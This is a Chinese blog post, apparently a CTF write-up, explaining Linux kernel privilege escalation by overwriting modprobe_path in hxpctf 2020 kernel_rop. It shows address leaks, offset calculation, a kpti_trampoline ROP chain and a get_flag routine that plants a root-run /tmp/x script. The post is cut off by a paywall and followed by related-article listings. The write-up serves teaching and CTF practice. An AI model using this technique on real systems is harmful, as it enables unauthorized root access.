基于modprobe_path的内核提权方法

最新推荐文章于 2024-05-05 00:00:00 发布
最新推荐文章于 2024-05-05 00:00:00 发布
阅读量804 收藏 3
点赞数
分类专栏: kernel pwn 文章标签: pwn 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/124240829
版权
本文介绍了Linux内核中的modprobe_path利用方法,通过改变modprobe_path的路径实现内核提权。内容包括modprobe的用途、攻击前提、利用流程,以及在hxpctf 2020 kernel_rop题目中的具体应用,涉及信息收集、溢出利用和ROP链构造等技术细节。
摘要由CSDN通过智能技术生成

什么是modprobe?
在这里插入图片描述

这玩意就是用于在Linux内核中添加一个可加载的内核模块,或者从内核中移除一个可加载的内核模块,它是我们在Linux内核中安装或卸载新模块时都要执行的一个程序。该程序的路径是一个内核全局变量,默认为/sbin/modprobe,我们可以通过运行以下命令来查看该路径:

cat /proc/sys/kernel/modprobe

在这里插入图片描述
这个路径是可写的,普通用户也是可以更改它的
而当内核运行一个错误格式的文件(或未知文件类型的文件)的时候,也会调用这个 modprobe_path所指向的程序。如果我们将这个字符串指向我们自己的sh文件 ,并使用 system或 execve 去执行一个未知文件类型的错误文件,那么在发生错误的时候就可以执行我们自己的二进制文件了。其调用流程如下

do_execve()->do_execveat_common()->bprm_execve()->exec_binprm()
->search_binary_handler()->request_module()->call_usermodehelper()

利用手法有一些前提条件:

  • 知道modprobe_path的地址
  • 知道kpti_trampoline的地址(用来返回用户态)
  • 能够任意地址写

接下来将以hxpctf 2020 kernel_rop这道题为例来介绍这种攻击手法

本题ko非常简单,直接给出了大范围的读写溢出,首先是信息收集,利用大范围的读溢出,拿到栈上的敏感数据,如cookie和image_base

cookie好说,直接读就行,image_base如何拿?

修改启动脚本,将uid从1000修改为0,方便我们调试,然后将栈上数据打印出来看看:
在这里插入图片描述

我们想要的image_base可以在/proc/kallsyms中的startup_64看到:

/ # cat /proc/kallsyms | grep startup_64
ffffffffb1400000 T startup_64
ffffffffb1400030 T secondary_startup_64
ffffffffb14001f0 T __startup_64

可以看到在第38号数据那里有一个距离startup_64固定偏移0xa157的数据
所以image_base可以通过leak[38]-0xa157来得到。

在这里插入图片描述

然后利用找到的image_base得到kpti_trampoline的地址:

/ # cat /proc/kallsyms  | grep swapgs_restore_regs_and_return_to_usermode
ffffffff93c00f10 T swapgs_restore_regs_and_return_to_usermode

计算出偏移:
0xffffffff93c00f10-0xffffffff93a00000=0x200f10

得到modprobe_path的地址

/ # cat /proc/kallsyms  | grep modprobe_path
ffffffff94a61820 D modprobe_path

计算出偏移:
0xffffffff94a61820-0xffffffff93a00000=0x1061820

对于kpti_trampoline的利用,要注意有两次多余的pop,其rop链非常简洁:

payload[off++] = kpti_trampoline;
payload[off++] = 0x0;        //dummy rax
payload[off++] = 0x0;        //dummy rdi
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

所以这里我们的思路就完整了,首先利用越界读泄露cookie和image_base,然后利用image_base得到kpti_trampoline和modprobe_path的地址,然后用越界写布置rop链,链子上要注意cookie正确,用gadget完成修改modprobe_path,执行get_flag函数,最后通过kpti_trampoline返回用户态。

get_flag函数中我们要写什么东西呢,现在modprobe_path已经修改成/tmp/x了,所以我们自然是要去创建这个文件,写入shell脚本,然后写一个系统不认识的文件,从而触发modprobe_path执行/tmp/x。

get_flag:

void get_flag(void){
   
    puts("[*] Returned to userland, setting up for fake modprobe");
    system("echo '#!/bin/sh\ncp /dev/sda /tmp/flag\nchmod 777 /tmp/flag' > /tmp/x");
    system("chmod +x /tmp/x");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
    system("chmod +x /tmp/dummy");
    puts
最低0.47元/天 解锁文章
Ayakaaaa
关注
专栏目录
内核中制作ko文件的步骤_linux命令:kernel内核编译、装载模块管理modprobe/screen...
weixin_29679557的博客
01-16 1234
内核设计风格:redhat,suse核心:动态加载 内核模块 在目录/boot/vmlinuz-版本号内核:/lib/modules/"内核版本号命令的目录"/vmlinuz-2.6.32/lib/modules/2.6.32/单内核linux核心:ko (kernel object)微内核:windows,solaris(线程)kernel初始化的过程:1、设备探测2、驱动初始化(可能会从in...
提权姿势modprobe_path修改文件权限
csdn546229768的博客
05-02 478
最近看内核exp时候一些题目的另一种解法可以通过modprobe_path方式读取flag,好像挺好玩的 定义 在内核运行一个未知类型的文件时,modprobe_path就会指向这个未知文件,当内核运行一个错误格式的文件后,内核会自动调用这个modprobe_path指向的文件,因为内核执行的权限是root权限,当我们将modprobe_path指向一个我们用于查看具有root权限的flag文件,那么就能得到flag //源码定义如下:kernel/kmod.c char modprobe_path[KMO
linux 内核提权总结(demo+exp分析) -- 任意读写(四)
北观止的博客
12-23 293
hijack_modprobe_path篇 原理同hijack_prctl, 当用户执行错误格式的elf文件时内核调用call_usermodehelper(char *modprobe_path ...) 修改modprobe后,即可实现root权限任意命令执行 攻击流程 (内核任意读写漏洞)内核修改全局变量 modprobe_path为目标指令 写入错误格式elf文件,并手动执行,触发 原文地址 一. 利用步骤 1. 定位modprobe_path(开启kaslr
解决Unable to find the module utility `modprobe`错误
sunmingyang1987的博客
02-22 1万+
安装NVIDIA显卡驱动时出现以下错误: [INFO]: ERROR: Unable to find the module utility `modprobe`; please make sure you have the package 'module-init-tools' or 'kmod' installed. If you do have 'module-init-tools' or ...
Linux内核模块
Paper_Love的博客
08-24 746
Linux内核模块 Linux 使用宏内核,但是宏内核有一个缺点就是扩展性比较差,为了弥补这一缺陷,Linux加入了内核模块,可以方便的加载和卸载内核模块,弥补扩展性差这个缺陷。 加载卸载内核模块 insmod *.ko 加载内核模块 rmmod *.ko 卸载内核模块 内核模块的入口和出口 module_init(); 入口函数 module_exit(); 出口函数 内核模块的信息声明 MODULE_LICENSE(); MODULE_AUTHOR(); ......
Linux伪文件系统proc
m0_61066945的博客
09-25 2570
Linux伪文件proc
Linux内核漏洞利用技术:覆写modprobe_path .pdf
09-05
Linux内核漏洞利用技术:覆写modprobe_path 安全架构 安全架构 业务风控 系统安全 APT
ubuntu打实时内核补丁教程以及安装后显卡驱动问题解决方法
weixin_39275295的博客
07-28 6619
在ubuntu20.04上安装成功,亲测有效 目录ubuntu打实时内核补丁教程1、下载实时内核2、解压和打补丁(patch)3、安装依赖和编译安装4、修改一些文件,便于之后切换内核5、重启电脑实时内核版本下安装nvidia显卡驱动的问题1、先切换回之前的内核(非实时)版本2、重装之前内核(非实时)版本下的显卡驱动3、切换回实时内核(按照上面的步骤)4、在实时内核下安装显卡驱动 ubuntu打实时内核补丁教程 安装目标系统:ubuntu20.04 电脑配置:i9,2080ti 1、下载实时内核 打开终端,输
Linux内核进程,线程,进程组,会话组织模型以及进程管理
tugouxp的专栏
11-27 2196
唤醒睡眠状态任意的线程可以用wake_up_process,它可和唤醒处于深度睡眠状态的线程。结合最开始的图和代码,我们可以得到如下结论:1.kthead衍生的内核线程没有session pid,说人话就是所有的内核线程没有都没有操作控制台,不能通过控制台去操作控制。2.idle任务不会出现在for_each_process的处理循环中。3.每cpu_rq就绪队列中,不会将idle统计到nr_running中。
modprobe命令及其与insmod & depmod的区别
qq_41483419的博客
09-06 827
linux
动态链接与可安装模块
qq_41104683的博客
07-10 597
动态链接与可安装模块
modprobe命令详解
程序猿Ricky的日常干货
04-26 1万+
modprobe工具可以智能的添加和删除一个模块,之所以说它智能,是因为它能够通过配置的一些预定义的规则解析出模块之间的依赖关系,并且自动加载依赖的模块。 modprobe会从 /lib/modules/uname -r目录中查找要加载的模块以及对应的依赖规则,除了这个目录以外,modprobe还有一个配置目录/etc/modprobe.d,这个配置目录中是用户可以自定义的一些modprobe行...
modprobe 及 配置文件 /etc/modprobe.conf
热门推荐
hunanchenxingyu的专栏
08-05 3万+
modprobe -- program to add and remove modules from the Linux Kernel 从linux核心中添加或删除模块。 modprobe intelligently adds or removes a module from the Linux kernel:  note  that  for  convenience,there  is
模块-内核模块加载命令modprobe使用注意事项
Walter的专栏
05-03 1839
1、要想使用modprobe必须将ko模块文件拷贝到/lib/moudels/uname -r/kernel目录中,然后执行depmod -A否则无法使用modprobe加载模块。 [root@localhost kernel]# cp fw.ko /lib/modules/2.6.18-164.el5/kernel/ [root@localhost kernel]# depmod -A
解决Ubuntu 显卡驱动升级导致的 显卡驱动和内核版本不匹配的问题
liuyang_xyz的博客
10-10 2万+
解决Ubuntu 显卡驱动升级导致的 显卡驱动和内核版本不匹配的问题 不要轻易升级显卡驱动版本!!!!!!!!!!! 1. 完全卸载Ubuntu当前显卡驱动 查看目前显卡驱动版本:sudo dpkg --list | grep nvidia-* sudo apt-get --purge remove nvidia* sudo apt autoremove sudo apt-get --purge remove “cublas” “cuda*” ###To remove CUDA Toolkit
Linux modprobe命令教程:如何智能添加和删除Linux内核模块(附实例详解和注意事项)
最新发布
u012964600的博客
05-05 5206
modprobe(模块加载)是一个智能的命令,用于从Linux内核中添加或删除模块。它会自动处理模块之间的依赖关系,并在需要时自动加载或卸载必要的模块。modprobe命令在模块名称中自动进行下划线和破折号的转换,这为用户提供了便利。
modprobe命令使用方法
weixin_33910137的博客
09-24 542
modprobe(module probe) 功能说明:自动处理可载入模块。语  法:modprobe[-acdlrtvV][--help][模块文件][符号名称=符号值]补充说明:modprobe可载入指定的个别模块,或是载入一组相依的模块。modprobe会根据depmod所产生的相依关系,决定要载入哪些模块。若在载入过程中发生错误,在modprobe会卸载整组的...
linux kernal pwn STARCTF 2019 hackme(一) 劫持modprobe_path
yongbaoii的博客
04-20 535
从用户态传入了0x20的数据,其数据放在了pool里面 在IDA里面看的话就是 就是他传入的四个QWORD 。 我们可以看得出来30001的时候就是通过v17来找到相关地址,然后kfree,再清零 所以其实就看得出来v17是index。 功能30002 v8是slab的地址 v20是从哪开始写 v9[1]里面就是size 所以就是往里面写 功能30003 上面是写进去 所以这个自然就是读出来 功能30000 读入一段 根据这一段申请slab 漏洞有两个 首先我们显而易见的在读写slab的时候对of.
提示modprobe未找到命令
09-23
### 回答1: 如果在使用sshfs命令挂载远程目录时出现了`modprobe: command not found`的错误提示,说明当前系统没有安装`modprobe`命令。`modprobe`是Linux系统中用于管理内核模块的命令,需要安装相应的软件包才能使用。可以按照以下步骤进行处理: 1. 确认系统中是否已经安装了`kmod`软件包: ``` sudo apt-get update sudo apt-get install kmod ``` 2. 如果系统中已经安装了`kmod`软件包,可以使用`kmod`命令代替`modprobe`命令执行相关操作。例如,将`modprobe fuse`命令替换为`kmod load fuse`。 3. 如果系统中没有安装`kmod`软件包,可以尝试安装`module-init-tools`软件包: ``` sudo apt-get update sudo apt-get install module-init-tools ``` 安装完成后,重新运行sshfs命令进行远程目录挂载。 如果还是无法解决问题,可以尝试更新系统或者重新安装完整的Linux发行版。 ### 回答2: 提示"modprobe未找到命令"通常是在Linux系统中运行modprobe命令时出现的错误信息。 modprobe是一个用于管理Linux内核模块的命令行工具。它允许用户在运行时加载、卸载和查询内核模块。 当系统提示"modprobe未找到命令"时,可能有以下几个原因: 1. modprobe命令不存在于系统路径中:这可能是因为modprobe命令所在的目录没有被添加到系统的环境变量中。可以通过使用命令"export PATH=$PATH:/usr/sbin"将modprobe命令所在的目录添加到环境变量中。 2. modprobe命令被错误地删除:有时候,用户可能会误删除系统中的某些文件,其中包括modprobe命令。在这种情况下,可以通过重新安装相关软件包来恢复modprobe命令。 3. 用户没有足够的权限:如果当前用户的权限不够高,就可能无法执行modprobe命令。可以尝试以root用户身份运行modprobe命令,或使用sudo来提升权限。 总之,当出现"modprobe未找到命令"的错误提示时,可以根据以上几个原因进行排查和解决。 ### 回答3: 当在系统中运行 "modprobe" 命令时,出现 "未找到命令" 的提示,通常是由于以下几个原因造成的: 1. 模块未正确安装:modprobe 用于载入内核模块,如果相关的模块未正确安装,系统就无法找到对应的命令。要解决此问题,可以使用包管理器安装相关模块,或者手动编译和安装模块。 2. 环境变量未正确配置:系统在执行命令时会根据环境变量来搜索可执行文件的路径。如果环境变量中没有包含 "modprobe" 命令所在的路径,就会出现未找到命令的提示。可以通过修改或添加 PATH 环境变量来解决该问题。 3. 命令路径错误:如果命令所在路径被更改或移动到其他位置,系统将无法找到该命令。可以使用 "which modprobe" 命令来查找命令所在的路径,并确保路径正确无误。 4. 命令不存在或未安装:如果系统中没有安装 modprobe 命令,就会出现未找到命令的提示。可以通过使用包管理器安装 modprobe 命令来解决该问题。 总结来说,如果出现 "modprobe 未找到命令" 的提示,可能是因为模块未正确安装、环境变量配置错误、命令路径错误、命令不存在或未安装等原因导致。可通过安装相关模块、配置环境变量、检查命令路径或安装对应命令来解决此问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值